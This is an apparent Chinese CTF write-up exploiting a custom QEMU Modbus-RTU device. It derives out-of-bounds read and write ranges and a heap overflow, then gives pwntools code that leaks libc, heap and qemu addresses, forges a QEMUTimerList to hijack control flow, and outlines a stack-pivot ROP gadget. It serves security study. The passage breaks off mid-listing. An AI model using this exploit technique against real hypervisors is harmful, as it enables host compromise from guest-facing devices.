\mathbf{start}\ \in\ [0,\ 256-\mathbf{count}] \ \cup\ [65536-\mathbf{count},\ 65535].
start ∈ [ 0 , 256 − count ] ∪ [ 65536 − count , 65535 ] .
若 count > 256(仍然是 257 个允许值,只是整体落在高端一段):
s t a r t ∈ [ 65536 − c o u n t , 65536 + 256 − c o u n t ] ( 在 [ 0 , 65535 ] 上视作模 2 16 的连续区间 ) .
\mathbf{start}\ \in\ [65536-\mathbf{count},\ 65536+256-\mathbf{count}]\ \ (\text{在 }[0,65535]\text{ 上视作模 }2^{16}\text{ 的连续区间}).
start ∈ [ 65536 − count , 65536 + 256 − count ] ( 在 [ 0 , 65535 ] 上视作模 2 16 的连续区间 ) .
读循环按真实 索引访问:
v = s->regs[ start + i ] , i = 0.. c o u n t − 1.
\texttt{v} = \texttt{s->regs[ start + i ]},\quad i=0.. \mathbf{count}-1.
v = s->regs[ start + i ] , i = 0.. count − 1.
因此相对 B 的字节范围 为:
[ 2 ⋅ s t a r t , 2 ⋅ ( s t a r t + c o u n t ) − 1 ]
\boxed{\
\bigl[\, 2\cdot\mathbf{start}\ ,\ 2\cdot(\mathbf{start}+\mathbf{count})-1 \,\bigr]\
}
[ 2 ⋅ start , 2 ⋅ ( start + count ) − 1 ]
总长度为:
2 ⋅ c o u n t 字节 .
\boxed{\,2\cdot\mathbf{count}\ \text{字节}\, }.
2 ⋅ count 字节 .
当 s t a r t ≥ 256 \mathbf{start}\ge 256 start ≥ 256 或 s t a r t + c o u n t − 1 ≥ 256 \mathbf{start}+\mathbf{count}-1 \ge 256 start + count − 1 ≥ 256 时,上述区间越过合法的 [0..511],形成越界读 。
FC03 回包分配与实际写入不一致:
byte_count = ( 2 ⋅ c o u n t ) & 0 x F F , out_len = 3 + byte_count + 2 ,
\text{byte\_count} = \bigl(2\cdot \mathbf{count}\bigr)\ \&\ 0x\mathrm{FF},
\qquad
\text{out\_len} = 3 + \text{byte\_count} + 2,
byte_count = ( 2 ⋅ count ) & 0 x FF , out_len = 3 + byte_count + 2 ,
但实际回填数据长度是 2 ⋅ c o u n t 2\cdot\mathbf{count} 2 ⋅ count 字节。当 c o u n t ≥ 128 \mathbf{count}\ge 128 count ≥ 128 时发生少分配→堆写越界 。
若只想“稳定越界读而不崩”,取
c o u n t ≤ 127
\boxed{\,\mathbf{count} \le 127\,}
count ≤ 127
此时
out_len = 3 + 2 ⋅ c o u n t + 2 ≤ 259 ≤ 260 ,
\text{out\_len} = 3 + 2\cdot\mathbf{count} + 2 \le 259 \le 260,
out_len = 3 + 2 ⋅ count + 2 ≤ 259 ≤ 260 ,
既不溢出,也不超出 RX 缓冲上限。
示例(脚本常用参数) :取 c o u n t = 127 \mathbf{count}=127 count = 127 ,s t a r t = 0 x F F 81 \mathbf{start}=0x\mathrm{FF81} start = 0 x FF81 ,则
[ 2 ⋅ 0 x F F 81 , 2 ⋅ ( 0 x F F 81 + 127 ) − 1 ] = [ 0 x 1 F F 02 , 0 x 1 F F F F ] ,
\bigl[\,2\cdot 0x\mathrm{FF81}\ ,\ 2\cdot(0x\mathrm{FF81}+127)-1\,\bigr]
=
\bigl[\,0x\mathrm{1FF02}\ ,\ 0x\mathrm{1FFFF}\,\bigr],
[ 2 ⋅ 0 x FF81 , 2 ⋅ ( 0 x FF81 + 127 ) − 1 ] = [ 0 x 1FF02 , 0 x 1FFFF ] ,
完全落在 regs 之后的大块堆内存里,便于稳定泄露。
因此我们可以取 count = 127,然后 start 可以取 [0xff81, 0x10081]。这样可以满足条件并读取 [2*start, 2*start + 0xfc] 范围的数据。
0x03:堆溢出 功能 0x03 读取的数据会写入 g_malloc 申请的堆块。
1 2 3 uint8_t byte_count = count * 2 ; size_t out_len = 3 + byte_count + 2 ; uint8_t *out = g_malloc(out_len);
FC03 不会对 regs 写入 ,故不存在“写 regs 邻接内存”的越界写,但 FC03 回包阶段 存在堆写越界 。其溢出覆盖区相对 out 缓冲为:
[ out + 3 + byte_count , out + 3 + 2 ⋅ c o u n t − 1 ] .
\bigl[\, \texttt{out}+3+\text{byte\_count}\ ,\ \texttt{out}+3+2\cdot\mathbf{count}-1 \,\bigr].
[ out + 3 + byte_count , out + 3 + 2 ⋅ count − 1 ] .
申请堆块的大小为:
byte_count = ( 2 ⋅ c o u n t ) m o d 256
\text{byte\_count} \;=\; (2\cdot \mathbf{count}) \bmod 256
byte_count = ( 2 ⋅ count ) mod 256
out_len = 3 + byte_count + 2 = 5 + ( ( 2 ⋅ c o u n t ) m o d 256 )
\boxed{\,\text{out\_len} \;=\; 3 + \text{byte\_count} + 2 \;=\; 5 + \bigl((2\cdot \mathbf{count}) \bmod 256\bigr)\,}
out_len = 3 + byte_count + 2 = 5 + ( ( 2 ⋅ count ) mod 256 )
因为2 ⋅ c o u n t 2\cdot \mathbf{count} 2 ⋅ count 恒为偶数,byte_count ∈ { 0 , 2 , 4 , … , 254 } \text{byte\_count}\in\{0,2,4,\dots,254\} byte_count ∈ { 0 , 2 , 4 , … , 254 } ,因此 out_len ∈ { 5 , 7 , 9 , … , 259 } \boxed{\,\text{out\_len}\in\{5,7,9,\dots,259\}\,} out_len ∈ { 5 , 7 , 9 , … , 259 }
溢出字节数(Δ \Delta Δ )为:
Δ = 2 ⋅ c o u n t − ( ( 2 ⋅ c o u n t ) m o d 256 ) = 256 × ⌊ 2 ⋅ c o u n t 256 ⌋
\boxed{\
\Delta
= 2\cdot \mathbf{count} - \bigl((2\cdot \mathbf{count}) \bmod 256\bigr)
= 256 \times \left\lfloor \dfrac{2\cdot \mathbf{count}}{256} \right\rfloor\
}
Δ = 2 ⋅ count − ( ( 2 ⋅ count ) mod 256 ) = 256 × ⌊ 256 2 ⋅ count ⌋
例如:count=256 溢出 512 字节;count=128 溢出 256 字节。
0x10:越界写 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 static void modbus_handle_fc10 (ModbusRtuState *s, const uint8_t *req) { const uint8_t addr = req[0 ]; const uint16_t start = be16_load(&req[2 ]); const uint16_t count = be16_load(&req[4 ]); const uint8_t byte_count = req[6 ]; if (count == 0 || (uint16_t )(start + count) > 0x100 U) { modbus_send_exception(s, addr, MODBUS_FC_WRITE_MULTIPLE, MODBUS_EX_ILLEGAL_DATA_ADDR); return ; } if (byte_count != 2 * count) { modbus_send_exception(s, addr, MODBUS_FC_WRITE_MULTIPLE, MODBUS_EX_ILLEGAL_DATA_VALUE); return ; } for (uint16_t i = 0 ; i < count; i++) { uint16_t v = be16_load(&req[7 + 2 * i]); s->regs[start + i] = v; } uint8_t out[8 ]; out[0 ] = addr; out[1 ] = MODBUS_FC_WRITE_MULTIPLE; be16_store(&out[2 ], start); be16_store(&out[4 ], count); uint16_t crc = modbus_crc16(out, 6 ); out[6 ] = (uint8_t )(crc & 0xFF ); out[7 ] = (uint8_t )(crc >> 8 ); modbus_send(s, out, sizeof (out)); }
写字节范围 = [ 2*start , 2*(start + count - 1) ](相对 regs_base)
写入数据时使用的 start 和 count 需要满足如下条件:
通过地址检查 (同样 16 位环回):count >= 1 且 (uint16_t)(start + count) <= 0x100
通过长度检查 :byte_count == 2*count
受接收缓冲限制 :帧长 9 + byte_count ≤ 260 → 2*count ≤ 251 → **count ≤ 125**(否则整帧放不下,被切割无法一次处理)
必须同时满足:
地址检查(同样 16 位回绕) :
c o u n t ≥ 1 且 ( ( s t a r t + c o u n t ) m o d 2 16 ) ≤ 256 ,
\mathbf{count}\ \ge\ 1
\quad\text{且}\quad
\bigl((\mathbf{start}+\mathbf{count}) \bmod 2^{16}\bigr)\ \le\ 256,
count ≥ 1 且 ( ( start + count ) mod 2 16 ) ≤ 256 ,
等价于
s t a r t ∈ [ − c o u n t , 256 − c o u n t ] ( m o d 2 16 ) .
\boxed{\
\mathbf{start}\ \in\ \bigl[-\mathbf{count},\ 256-\mathbf{count}\bigr]\ \ (\bmod\ 2^{16})\
}.
start ∈ [ − count , 256 − count ] ( mod 2 16 ) .
长度一致性检查 :
byte_count = 2 ⋅ c o u n t .
\boxed{\,\text{byte\_count} = 2\cdot \mathbf{count}\,}.
byte_count = 2 ⋅ count .
请求帧长度受 RX=260 限制 (try_parse 的判长约束):
9 + 2 ⋅ c o u n t ≤ 260 ⟹ c o u n t ≤ 125 .
9 + 2\cdot \mathbf{count} \ \le\ 260
\ \Longrightarrow\
\boxed{\,\mathbf{count} \le 125\,}.
9 + 2 ⋅ count ≤ 260 ⟹ count ≤ 125 .
写循环按真实 索引:
s->regs[ start + i ] = be16_load(...) , i = 0.. c o u n t − 1.
\texttt{s->regs[ start + i ]} = \text{be16\_load(...)} ,\quad i=0.. \mathbf{count}-1.
s->regs[ start + i ] = be16_load(...) , i = 0.. count − 1.
相对 B 的字节范围 为:
[ 2 ⋅ s t a r t , 2 ⋅ ( s t a r t + c o u n t ) − 1 ]
\boxed{\
\bigl[\, 2\cdot\mathbf{start}\ ,\ 2\cdot(\mathbf{start}+\mathbf{count})-1 \,\bigr]\
}
[ 2 ⋅ start , 2 ⋅ ( start + count ) − 1 ]
总长度:
2 ⋅ c o u n t 字节 .
\boxed{\,2\cdot\mathbf{count}\ \text{字节}\, }.
2 ⋅ count 字节 .
当 s t a r t ≥ 256 \mathbf{start}\ge 256 start ≥ 256 或 s t a r t + c o u n t − 1 ≥ 256 \mathbf{start}+\mathbf{count}-1 \ge 256 start + count − 1 ≥ 256 时,该区间越过合法范围,形成对 regs 之后内存的越界写 。
单帧最大越界写(250 字节) :c o u n t = 125 \mathbf{count}=125 count = 125 (受 RX 限制),覆盖
[ 2 ⋅ s t a r t , 2 ⋅ ( s t a r t + 125 ) − 1 ] ,
\bigl[\,2\cdot \mathbf{start}\ ,\ 2\cdot(\mathbf{start}+125)-1\,\bigr],
[ 2 ⋅ start , 2 ⋅ ( start + 125 ) − 1 ] ,
选择 s t a r t \mathbf{start} start 于允许集合的高端区间(如 [ 0 x F F 83 . . 0 x F F F F ] [0x\mathrm{FF83}..0x\mathrm{FFFF}] [ 0 x FF83 ..0 x FFFF ] )即可既过检查又落到 regs 之外。
漏洞利用 泄露地址 通过 0x03 越界读 泄露地址:
1 2 3 4 5 6 7 8 leak = fc03_req(0 , 0xff81 , 127 )[4 :] print (hexdump(leak))libc.address = u64(leak[0x38 :0x38 + 8 ]) - 0x203b60 success("libc base: " + hex (libc.address)) heap_base = u64(leak[0x48 :0x48 + 8 ]) - 0xa4270 success("heap base: " + hex (heap_base)) qemu.address = u64(leak[0xe0 :0xe0 + 8 ]) - 0x9ea35e success("qemu base: " + hex (qemu.address))
00000000 3a 3a 76 6d 73 74 61 74 65 2d 69 66 00 55 00 00 │::vm│ stat│ e-if│ · U·· │
00000010 21 00 00 00 00 00 00 00 70 63 69 2d 64 65 76 69 │!··· │ ···· │ pci-│ devi│
00000020 63 65 3a 3a 76 6d 73 74 61 74 65 2d 69 66 00 00 │ce::│ vmst│ ate-│ if·· │
00000030 31 00 00 00 00 00 00 00 60 3b 80 f7 ff 7f 00 00 │1··· │ ···· │ `;··│ · · ·· │
00000040 60 3b 80 f7 ff 7f 00 00 70 92 57 57 55 55 00 00 │`;··│ · · ·· │ p· WW│ UU·· │
00000050 50 91 57 57 55 55 00 00 70 9c 57 57 55 55 00 00 │P· WW│ UU·· │ p· WW│ UU·· │
00000060 21 00 00 00 00 00 00 00 00 a5 57 57 55 55 00 00 │!··· │ ···· │ · · WW│ UU·· │
00000070 f0 aa 57 57 55 55 00 00 61 62 6c 65 00 00 00 00 │·· WW│ UU·· │ able│ ···· │
00000080 21 00 00 00 00 00 00 00 06 00 00 00 05 00 00 00 │!··· │ ···· │· ··· │· ··· │
00000090 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 │· ··· │ ···· │· ··· │ ···· │
000000a0 21 00 00 00 00 00 00 00 6f 6e 2f 6f 66 66 00 00 │!··· │ ···· │ on/o│ ff·· │
000000b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │···· │ ···· │ ···· │ ···· │
000000c0 61 00 00 00 00 00 00 00 50 98 57 57 55 55 00 00 │a··· │ ···· │ P· WW│ UU·· │
000000d0 70 98 57 57 55 55 00 00 00 00 00 00 00 00 00 00 │p· WW│ UU·· │ ···· │ ···· │
000000e0 5e e3 f3 55 55 55 00 00 ec e3 f3 55 55 55 00 00 │^·· U│ UU·· │··· U│ UU·· │
000000f0 00 00 00 00 00 00 00 00 b6 f4 │···· │ ···· │·· │
000000fa
[+ ] libc base: 0x7ffff7600000
[+ ] heap base: 0x5555574d5000
[+ ] qemu base: 0x555555554000
调试发现这部分数据可以泄露堆地址 ,libc 基地址 和程序基地址 ,多次测试发现这部分数据内容很稳定。
pwndbg> u
► 0x555555962f27 movzx eax , word ptr [ rax + rdx * 2 + 2 ] EAX , [0x555557579724 ] => 0x6970
0x555555962f2c mov word ptr [ rbp - 0x1a ], ax
0x555555962f30 movzx eax , word ptr [ rbp - 0x1a ] EAX , [0x7fffffffd7e6 ]
0x555555962f34 shr ax , 8
0x555555962f38 mov ecx , eax
0x555555962f3a mov rax , qword ptr [ rbp - 0x18 ] RAX , [0x7fffffffd7e8 ]
0x555555962f3e lea rdx , [ rax + 1 ]
0x555555962f42 mov qword ptr [ rbp - 0x18 ], rdx
0x555555962f46 mov rdx , qword ptr [ rbp - 8 ] RDX , [0x7fffffffd7f8 ]
0x555555962f4a add rax , rdx
0x555555962f4d mov edx , ecx
pwndbg> telescope 0x555557579724+4 32
00:0000│ 0x555557579728 ◂— '::vmstate-if'
01:0008│ 0x555557579730 ◂— 0x550066692d65 /* 'e-if' */
02:0010│ 0x555557579738 ◂— 0x21 /* '!' */
03:0018│ 0x555557579740 ◂— 'pci-device::vmstate-if'
04:0020│ 0x555557579748 ◂— 'ce::vmstate-if'
05:0028│ 0x555557579750 ◂— 0x66692d657461 /* 'ate-if' */
06:0030│ 0x555557579758 ◂— 0x31 /* '1' */
07:0038│ 0x555557579760 —▸ 0x7ffff7803b60 (main_arena+160) —▸ 0x7ffff7803b50 (main_arena+144) —▸ 0x7ffff7803b40 (main_arena+128) —▸ 0x555557557ad0 ◂— ...
08:0040│ 0x555557579768 —▸ 0x7ffff7803b60 (main_arena+160) —▸ 0x7ffff7803b50 (main_arena+144) —▸ 0x7ffff7803b40 (main_arena+128) —▸ 0x555557557ad0 ◂— ...
09:0048│ 0x555557579770 —▸ 0x555557579270 —▸ 0x5555575792d0 ◂— 0x657a69736d6f72 /* 'romsize' */
0a:0050│ 0x555557579778 —▸ 0x555557579150 —▸ 0x555557579060 ◂— 0x72646461 /* 'addr' */
0b:0058│ 0x555557579780 —▸ 0x555557579c70 —▸ 0x555557579cd0 ◂— 'x-pcie-ext-tag'
0c:0060│ 0x555557579788 ◂— 0x21 /* '!' */
0d:0068│ 0x555557579790 —▸ 0x55555757a500 —▸ 0x55555757a340 —▸ 0x55555757a4c0 ◂— 'pci-piix::resettable'
0e:0070│ 0x555557579798 —▸ 0x55555757aaf0 —▸ 0x55555757a870 —▸ 0x55555757a6a0 —▸ 0x55555757a820 ◂— ...
0f:0078│ 0x5555575797a0 ◂— 0x656c6261 /* 'able' */
10:0080│ 0x5555575797a8 ◂— 0x21 /* '!' */
11:0088│ 0x5555575797b0 ◂— 0x500000006
12:0090│ 0x5555575797b8 ◂— 1
13:0098│ 0x5555575797c0 ◂— 1
14:00a0│ 0x5555575797c8 ◂— 0x21 /* '!' */
15:00a8│ 0x5555575797d0 ◂— 0x66666f2f6e6f /* 'on/off' */
16:00b0│ 0x5555575797d8 ◂— 0
17:00b8│ 0x5555575797e0 ◂— 0
18:00c0│ 0x5555575797e8 ◂— 0x61 /* 'a' */
19:00c8│ 0x5555575797f0 —▸ 0x555557579850 ◂— 'failover_pair_id'
1a:00d0│ 0x5555575797f8 —▸ 0x555557579870 ◂— 0x727473 /* 'str' */
1b:00d8│ 0x555557579800 ◂— 0
1c:00e0│ 0x555557579808 —▸ 0x555555f3e35e ◂— endbr64
1d:00e8│ 0x555557579810 —▸ 0x555555f3e3ec ◂— endbr64
1e:00f0│ 0x555557579818 ◂— 0
1f:00f8│ 0x555557579820 —▸ 0x555555f3f4b6 ◂— endbr64
劫持程序执行流 0x03 功能在越界读的同时由于存在整数溢出导致 g_malloc 分配的 out_buf 存在堆溢出。
调试发现在申请堆块的时候,tcache 中 0x20 大小的空闲堆块后面紧邻的数据如下:
pwndbg> u 1
► 0x555555962eb1 call g_malloc@plt <g_malloc@plt >
rdi : 5
rsi : 0x555557559a22 ◂— 0x4774800080ff0300
rdx : 0xff80
rcx : 0x74
0x555555962eb6 mov qword ptr [ rbp - 8 ], rax
0x555555962eba mov qword ptr [ rbp - 0x18 ], 0
pwndbg> bins
tcachebins
0x20 [ 2] : 0x555557557e90 —▸ 0x5555577ae010 ◂— 0
0x30 [ 6] : 0x5555577adf80 —▸ 0x555557559700 —▸ 0x5555577ae100 —▸ 0x5555577abbd0 —▸ 0x55555779ffc0 —▸ 0x5555577ab830 ◂— 0
0x60 [ 1] : 0x5555577aa8c0 ◂— 0
0x80 [ 2] : 0x5555577acf60 —▸ 0x5555577ab660 ◂— 0
0x90 [ 7] : 0x5555576a60d0 —▸ 0x55555755c980 —▸ 0x55555755c8f0 —▸ 0x5555574dabb0 —▸ 0x5555574da640 —▸ 0x5555574da5b0 —▸ 0x5555574da0e0 ◂— 0
0xe0 [ 4] : 0x5555577abc40 —▸ 0x5555577ab860 —▸ 0x5555577ab530 —▸ 0x5555577ab450 ◂— 0
0xf0 [ 2] : 0x5555577aad10 —▸ 0x5555577aabb0 ◂— 0
0x100 [ 7] : 0x555557558c30 —▸ 0x555557558b30 —▸ 0x555557557700 —▸ 0x555557557600 —▸ 0x555557557500 —▸ 0x555557557400 —▸ 0x5555577ab940 ◂— 0
0x110 [ 7] : 0x55555755d230 —▸ 0x55555755d120 —▸ 0x5555574f48d0 —▸ 0x5555574f2dc0 —▸ 0x5555574f2cb0 —▸ 0x5555574db320 —▸ 0x5555574db210 ◂— 0
0x1e0 [ 1] : 0x5555574d52a0 ◂— 0
0x210 [ 6] : 0x55555755fea0 —▸ 0x55555755e390 —▸ 0x55555755e180 —▸ 0x5555574f8280 —▸ 0x5555574f4bf0 —▸ 0x5555574f49e0 ◂— 0
0x410 [ 5] : 0x5555575600b0 —▸ 0x5555574ff7e0 —▸ 0x5555574f88a0 —▸ 0x5555574f8490 —▸ 0x5555574d5500 ◂— 0
fastbins
empty
unsortedbin
all : 0x5555577ad560 —▸ 0x7ffff7803b20 (main_arena+96) ◂— 0x5555577ad560
smallbins
0x20 : 0x555557557ad0 —▸ 0x555557557950 —▸ 0x5555577a12b0 —▸ 0x7ffff7803b30 (main_arena+112) ◂— 0x555557557ad0
0x60 : 0x555557559690 —▸ 0x5555577ad130 —▸ 0x7ffff7803b70 (main_arena+176) ◂— 0x555557559690
largebins
0x1000-0x11f0 : 0x5555577abd10 —▸ 0x7ffff7804140 (main_arena+1664) ◂— 0x5555577abd10
pwndbg> telescope 0x555557557e90+0x10 20
00:0000│ 0x555557557ea0 ◂— 0x80
01:0008│ 0x555557557ea8 ◂— 0x81
02:0010│ 0x555557557eb0 —▸ 0x5555574d40a0 —▸ 0x555557558380 ◂— 0x5555574d40a0
03:0018│ 0x555557557eb8 ◂— 0
... ↓ 5 skipped
09:0048│ 0x555557557ee8 ◂— 0x100000000
0a:0050│ 0x555557557ef0 ◂— 0
0b:0058│ 0x555557557ef8 ◂— 0
0c:0060│ 0x555557557f00 —▸ 0x5555575583c8 —▸ 0x555557557eb0 —▸ 0x5555574d40a0 —▸ 0x555557558380 ◂— ...
0d:0068│ 0x555557557f08 —▸ 0x555555c13703 ◂— endbr64
0e:0070│ 0x555557557f10 ◂— 0
0f:0078│ 0x555557557f18 ◂— 0x100000000
10:0080│ 0x555557557f20 ◂— 0
11:0088│ 0x555557557f28 ◂— 0x81
12:0090│ 0x555557557f30 —▸ 0x5555574d40b0 —▸ 0x555557558400 ◂— 0x5555574d40b0
13:0098│ 0x555557557f38 ◂— 0
在 IDA 中通过 timer_init_full 函数可以定位到 main_loop_tlg 的地址:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 void __fastcall timer_init_full ( QEMUTimer *ts, QEMUTimerListGroup *timer_list_group, QEMUClockType type, int scale, int attributes, QEMUTimerCB *cb, void *opaque) { QEMUTimerListGroup *timer_list_groupa; timer_list_groupa = timer_list_group; if ( !timer_list_group ) timer_list_groupa = &main_loop_tlg; ts->timer_list = timer_list_groupa->tl[type]; ts->cb = cb; ts->opaque = opaque; ts->scale = scale; ts->attributes = attributes; ts->expire_time = -1 ; }
main_loop_tlg 类型为 QEMUTimerListGroup,实际上是一个 QEMUTimerList 指针数组:
1 2 3 struct QEMUTimerListGroup { QEMUTimerList *tl[4 ]; }
调试发现其中第一项 QEMUTimerList 指针指向的位置与前面紧邻的 tcachebin 中 0x20 大小的空闲堆块紧邻:
pwndbg> telescope $rebase(0x1F80080)
00:0000│ 0x5555574d4080 —▸ 0x555557557eb0 —▸ 0x5555574d40a0 —▸ 0x555557558380 ◂— 0x5555574d40a0
01:0008│ 0x5555574d4088 —▸ 0x555557557f30 —▸ 0x5555574d40b0 —▸ 0x555557558400 ◂— 0x5555574d40b0
02:0010│ 0x5555574d4090 —▸ 0x555557557fb0 —▸ 0x5555574d40c0 —▸ 0x555557558480 ◂— 0x5555574d40c0
03:0018│ 0x5555574d4098 —▸ 0x555557558030 —▸ 0x5555574d40d0 —▸ 0x555557558500 ◂— 0x5555574d40d0
因此我们可以尝试溢出覆盖 QEMUTimerList 结构从而劫持程序执行流程。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 payload_addr = heap_base + 0x82eb0 payload = b"" payload += flat({ 0 : p64(0xdeaddead ), 0x8 : flat({ 0x0 : flat( p32(0 ), p32(0 ), p32(0 ), p32(0 ), p32(0 ), p16(0 ), p16(0 ), p64(0 ), p64(0 ) ), 0x34 : p8(1 ) }), 0x40 : p64(0xbeefbeef ) }) payload = payload.replace(p64(0xbeefbeef ), p64(payload_addr + len (payload))) payload += flat({ 0x0 : p64(0 ), 0x10 : p64(0xdeadbeef ), 0x18 : b'a' * 8 }) payload = payload.replace(p64(0xdeaddead ), p64(payload_addr + len (payload))) payload += flat({ 0x8 : p32(0 ), 0xc : p8(1 ), }) payload = flat( {23 : payload}, filler=cyclic(250 , n=8 ), length=250 ) print (hexdump(payload))fc10_req(0 , (0x10000 - 250 // 2 ), payload) fc03_req(0 , 0x10000 - 0x80 , 0x80 )
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────────────────────────────
* RAX 0x6161616161616161 ('aaaaaaaa')
RBX 0x7fffffffec98 —▸ 0x7fffffffee94 ◂— '/home/ctf/qemu-system-x86_64'
RCX 0
* RDX 0xdeadbeef
* RDI 0x6161616161616161 ('aaaaaaaa')
RSI 0
* R8 0x13bf9aa800000
* R9 0
* R10 0x7ffff7fbf080
* R11 0x23430a
R12 9
R13 0
R14 0x5555565b3838 —▸ 0x55555588a750 ◂— endbr64
R15 0x7ffff7ffd000 (_rtld_global) —▸ 0x7ffff7ffe2e0 —▸ 0x555555554000 ◂— 0x10102464c457f
* RBP 0x7fffffffea60 —▸ 0x7fffffffea80 —▸ 0x7fffffffeaa0 —▸ 0x7fffffffeaf0 —▸ 0x7fffffffeb10 ◂— ...
* RSP 0x7fffffffea08 —▸ 0x5555561820fd ◂— mov rax , qword ptr [ rip + 0x132862c ]
* RIP 0xdeadbeef
─────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────────────────────────────
Invalid address 0xdeadbeef
───────────────────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────────────────
00:0000│ rsp 0x7fffffffea08 —▸ 0x5555561820fd ◂— mov rax , qword ptr [ rip + 0x132862c ]
01:0008│-050 0x7fffffffea10 ◂— 9 /* '\t' */
02:0010│-048 0x7fffffffea18 —▸ 0x555557557eb0 —▸ 0x555557557f18 ◂— 0
03:0018│-040 0x7fffffffea20 —▸ 0x5555565b3838 —▸ 0x55555588a750 ◂— endbr64
04:0020│-038 0x7fffffffea28 —▸ 0x7ffff7ffd000 (_rtld_global) —▸ 0x7ffff7ffe2e0 —▸ 0x555555554000 ◂— 0x10102464c457f
05:0028│-030 0x7fffffffea30 —▸ 0x555557557ef8 ◂— 0x000000000000ffff
06:0030│-028 0x7fffffffea38 ◂— 0x178a21f0af24
07:0038│-020 0x7fffffffea40 ◂— 0xdeadbeef
─────────────────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────────────────
► 0 0xdeadbeef None
1 0x5555561820fd None
2 0x5555561821b3 None
3 0x55555618253f None
4 0x55555617c9c8 None
5 0x555555c4286e None
6 0x555556088bf3 None
7 0x555556088cb1 None
─────────────────────────────────────────────────────[ THREADS (2 TOTAL) ]─────────────────────────────────────────────────────
► 1 "qemu-system-x86 " stopped : 0xdeadbeef
2 "qemu-system-x86 " stopped : 0x7ffff772728d <syscall+29 >
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg>
劫持程序执行流程的函数是 timerlist_run_timers。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 bool __cdecl timerlist_run_timers (QEMUTimerList *timer_list) { QEMUClockType type; bool progress; QEMUTimer *ts; int64_t current_time; QEMUTimerCB *cb; void *opaque; progress = 0 ; if ( !timer_list->active_timers ) return 0 ; qemu_event_reset(&timer_list->timers_done_ev); if ( timer_list->clock->enabled ) { type = timer_list->clock->type; if ( type != QEMU_CLOCK_VIRTUAL_RT ) { if ( type == QEMU_CLOCK_HOST && !replay_checkpoint(ReplayCheckpoint::CHECKPOINT_CLOCK_HOST) ) goto out; LABEL_9: current_time = qemu_clock_get_ns(timer_list->clock->type); qemu_mutex_lock_func(&timer_list->active_timers_lock, "../util/qemu-timer.c" , 534 ); while ( 1 ) { ts = timer_list->active_timers; if ( !ts || !timer_expired_ns(ts, current_time) ) break ; if ( replay_mode && timer_list->clock->type == QEMU_CLOCK_VIRTUAL && (ts->attributes & 1 ) == 0 && !replay_checkpoint(ReplayCheckpoint::CHECKPOINT_CLOCK_VIRTUAL) ) { qemu_mutex_unlock_impl(&timer_list->active_timers_lock, "../util/qemu-timer.c" , 550 ); goto out; } timer_list->active_timers = ts->next; ts->next = 0 ; ts->expire_time = -1 ; cb = ts->cb; opaque = ts->opaque; qemu_mutex_unlock_impl(&timer_list->active_timers_lock, "../util/qemu-timer.c" , 562 ); cb(opaque); qemu_mutex_lock_func(&timer_list->active_timers_lock, "../util/qemu-timer.c" , 564 ); progress = 1 ; } qemu_mutex_unlock_impl(&timer_list->active_timers_lock, "../util/qemu-timer.c" , 568 ); goto out; } if ( replay_checkpoint(ReplayCheckpoint::CHECKPOINT_CLOCK_VIRTUAL_RT) ) goto LABEL_9; } out: qemu_event_set(&timer_list->timers_done_ev); return progress; }
在伪造 QEMUTimerList 的时候需要特别注意以下两点:
任意代码执行 在劫持程序执行流的时候,rax 和 rdi 寄存器是可控的,我们可以使用下面这个 gadget 将栈迁移到我们可控的内存上,然后执行 ROP:
► 0x555555c5dc51 push rax
0x555555c5dc52 add byte ptr [ rax - 0x75 ], cl [0x555557557eab ] <= 0x61 (0x61 + 0x0)
0x555555c5dc55 pop rbp RBP => 0x555557557f20
0x555555c5dc56 clc
0x555555c5dc57 leave
0x555555c5dc58 xor eax , eax EAX => 0
0x555555c5dc5a xor edx , edx EDX => 0
0x555555c5dc5c xor ecx , ecx ECX => 0
0x555555c5dc5e xor esi , esi ESI => 0
0x555555c5dc60 xor edi , edi EDI => 0
0x555555c5dc62 ret <__spawnix+875 >
↓
0x7ffff770f78b <__spawnix+875> pop rdi RDI => 0xa
0x7ffff770f78c <__spawnix+876> ret <eval_expr_multdiv+157 >
至于如何回显数据,TCP 服务器“监听”和“已建立连接”用的是两套不同的 socket :
监听阶段:进程先 socket() → bind() → listen(),得到一个监听 FD (只用于排队新连接,不传数据)。
建连后:当有客户端进来,内核在监听 socket 的基础上克隆出一个全新的连接 socket 放到 accept 队列,进程 accept() 得到新的 FD (用于和这个客户端收发数据)。监听 FD 仍然保留,用来继续接其它连接。
在这道题目中:
ctf@7646de6860b3:~$ ps -aux|grep qemu
ctf 170 0.0 1.5 509920 24296 pts/0 Sl 10:49 0:00 ./qemu -system-x86_64 -machine none -nographic -nodefaults -chardev socket,id=mbus,host=0.0.0.0,port=1502,server=on,wait=off -device modbus-rtu,chardev=mbus,unit-id=1
ctf 175 0.0 0.1 3528 1724 pts/3 S+ 10:49 0:00 grep --color=auto qemu
ctf@7646de6860b3:~$ ls -al /proc/170/fd
total 0
dr-x------ 2 ctf ctf 11 Oct 30 10:49 .
dr-xr-xr-x 9 ctf ctf 0 Oct 30 10:49 ..
lrwx------ 1 ctf ctf 64 Oct 30 10:49 0 -> /dev/pts/0
lrwx------ 1 ctf ctf 64 Oct 30 10:49 1 -> /dev/pts/0
lrwx------ 1 ctf ctf 64 Oct 30 10:49 10 -> 'socket:[274261]'
lrwx------ 1 ctf ctf 64 Oct 30 10:49 2 -> /dev/pts/0
lrwx------ 1 ctf ctf 64 Oct 30 10:49 3 -> 'anon_inode:[eventpoll]'
